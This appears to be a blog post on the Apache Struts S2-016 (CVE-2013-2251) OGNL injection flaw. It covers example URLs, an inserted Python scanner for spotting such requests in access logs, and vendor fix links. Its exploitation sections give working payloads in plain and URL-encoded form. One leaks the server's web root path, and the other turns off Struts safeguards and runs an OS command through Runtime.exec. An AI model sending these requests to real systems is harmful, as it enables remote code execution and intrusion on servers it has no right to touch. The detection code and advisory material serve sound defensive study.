S2–016 (Apache Struts) Remote Code Execution Vulnerability

Nee_Tech
2 min read · May 7, 2020

A remote user can execute arbitrary code on the affected system, and can also conduct URL redirection attacks. A remote user can submit a URL with specially crafted ‘action:’, ‘redirect:’ or ‘redirectAction:’ parameter values to cause the system to evaluate the values as an OGNL expression and potentially execute arbitrary code on the target system [CVE-2013-2251].

Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix.

Example-
http://[target]/struts2/login.action?redirect:http://www.google.com%25[exploit code]
http://[target]/struts2/login.action?redirect:$[exploit code]
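From the defender's side, the distinguishing feature of an S2-016 request is a query parameter whose name starts with one of the three prefixes above, often double URL-encoded (the %25 in the example stands for a literal %). The following Python scanner is an added example, not code from the original post: it undoes repeated percent-encoding, flags such parameters, and reports whether an OGNL expression marker is present. The access-log lines are constructed for the example.

```python
import re

# Parameter prefixes that S2-016 (CVE-2013-2251) causes Struts 2 to evaluate.
OGNL_PREFIXES = ("action:", "redirect:", "redirectAction:")
# Tokens that indicate an OGNL expression or context access in the value.
OGNL_MARKERS = re.compile(r"\$\{|%\{|#context|#_memberAccess|@[\w.]+@")
# Extracts the request target from a combined-format access-log line.
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def fully_decode(text, max_rounds=3):
    """Undo nested percent-encoding (e.g. %2524 -> %24 -> $), bounded."""
    from urllib.parse import unquote
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def classify_url(url):
    """Return 'ognl', 'prefix' (redirect prefix without OGNL) or 'clean'."""
    query = url.partition("?")[2]          # keep a raw '#' in the query
    verdict = "clean"
    for part in query.split("&"):
        name, _, value = part.partition("=")
        name, value = fully_decode(name), fully_decode(value)
        if not name.startswith(OGNL_PREFIXES):
            continue
        if OGNL_MARKERS.search(name + value):
            return "ognl"
        verdict = "prefix"                 # redirect injection, no expression
    return verdict

def scan_log(lines):
    """Return (request_target, verdict) for every non-clean request."""
    findings = []
    for line in lines:
        match = REQUEST_LINE.search(line)
        if match:
            verdict = classify_url(match.group(1))
            if verdict != "clean":
                findings.append((match.group(1), verdict))
    return findings

# Constructed sample log lines: a normal login, a double-encoded OGNL marker
# after a redirect: prefix, an encoded ${...} after redirectAction:, and a
# redirect: prefix that only carries a plain URL.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/May/2020:10:01:02 +0000] "GET /struts2/login.action?username=bob HTTP/1.1" 200 512',
    '10.0.0.9 - - [07/May/2020:10:01:07 +0000] "GET /struts2/login.action?redirect:http://www.google.com%25%24%7b%23context%7d HTTP/1.1" 302 0',
    '10.0.0.9 - - [07/May/2020:10:01:09 +0000] "GET /logout.action?redirectAction:%24%7b1%2b1%7d HTTP/1.1" 302 0',
    '10.0.0.9 - - [07/May/2020:10:01:12 +0000] "GET /struts2/login.action?redirect:http://www.google.com HTTP/1.1" 302 0',
]
```

The first three prefixes are the ones the advisory names, so a `prefix` hit on a patched server is still worth alerting on as an open-redirect attempt.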

Checking the Vulnerability-

(Screenshot: Checking Vulnerability)

Exploiting the Vulnerability-

(Screenshot: Payload URL Encoding)

GetWebDirectory-
redirect:${#req=#context.get(‘co’+’m.open’+’symphony.xwo’+’rk2.disp’+’atcher.HttpSer’+’vletReq’+’uest’),#resp=#context.get(‘co’+’m.open’+’symphony.xwo’+’rk2.disp’+’atcher.HttpSer’+’vletRes’+’ponse’),#resp.setCharacterEncoding(‘UTF-8’),#ot=#resp.getWriter (),#ot.print(‘web’),#ot.print(‘path:’),#ot.print(#req.getSession().getServletContext().getRealPath(‘/’)),#ot.flush(),#ot.close()}

http://<IP Address>/logout.action?redirect:http://www.google.com/%25%24%7b%23%72%65%71%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%27%63%6f%27%2b%27%6d%2e%6f%70%65%6e%27%2b%27%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%27%2b%27%72%6b%32%2e%64%69%73%70%27%2b%27%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%27%2b%27%76%6c%65%74%52%65%71%27%2b%27%75%65%73%74%27%29%2c%23%72%65%73%70%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%27%63%6f%27%2b%27%6d%2e%6f%70%65%6e%27%2b%27%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%27%2b%27%72%6b%32%2e%64%69%73%70%27%2b%27%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%27%2b%27%76%6c%65%74%52%65%73%27%2b%27%70%6f%6e%73%65%27%29%2c%23%72%65%73%70%2e%73%65%74%43%68%61%72%61%63%74%65%72%45%6e%63%6f%64%69%6e%67%28%27%55%54%46%2d%38%27%29%2c%23%6f%74%3d%23%72%65%73%70%2e%67%65%74%57%72%69%74%65%72%20%28%29%2c%23%6f%74%2e%70%72%69%6e%74%28%27%77%65%62%27%29%2c%23%6f%74%2e%70%72%69%6e%74%28%27%70%61%74%68%3a%27%29%2c%23%6f%74%2e%70%72%69%6e%74%28%23%72%65%71%2e%67%65%74%53%65%73%73%69%6f%6e%28%29%2e%67%65%74%53%65%72%76%6c%65%74%43%6f%6e%74%65%78%74%28%29%2e%67%65%74%52%65%61%6c%50%61%74%68%28%27%2f%27%29%29%2c%23%6f%74%2e%66%6c%75%73%68%28%29%2c%23%6f%74%2e%63%6c%6f%73%65%28%29%7d

(Screenshot: Getting Web Directory)

IPConfig-
redirect:${#context[‘xwork.MethodAccessor.denyMethodExecution’]=false,#f=#_memberAccess.getClass().getDeclaredField(‘allowStaticMethodAccess’),#f.setAccessible(true),#f.set(#_memberAccess,true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(‘ipconfig’).getInputStream())}

http://<IP Address>/logout.action?redirect:$%7b%23%63%6f%6e%74%65%78%74%5b%27%78%77%6f%72%6b%2e%4d%65%74%68%6f%64%41%63%63%65%73%73%6f%72%2e%64%65%6e%79%4d%65%74%68%6f%64%45%78%65%63%75%74%69%6f%6e%27%5d%3d%66%61%6c%73%65%2c%23%66%3d%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%2e%67%65%74%43%6c%61%73%73%28%29%2e%67%65%74%44%65%63%6c%61%72%65%64%46%69%65%6c%64%28%27%61%6c%6c%6f%77%53%74%61%74%69%63%4d%65%74%68%6f%64%41%63%63%65%73%73%27%29%2c%23%66%2e%73%65%74%41%63%63%65%73%73%69%62%6c%65%28%74%72%75%65%29%2c%23%66%2e%73%65%74%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%2c%74%72%75%65%29%2c%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%69%70%63%6f%6e%66%69%67%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%7d

(Screenshot: IP Config Details)

Mitigation-
The vendor has issued a fix (2.3.15.1). The vendor’s advisory is available at:
http://struts.apache.org/release/2.3.x/docs/s2-016.html
http://struts.apache.org/release/2.3.x/docs/s2-017.htm

More Reading-
https://waf.ninja/struts2-vulnerability-evolution/#s2016
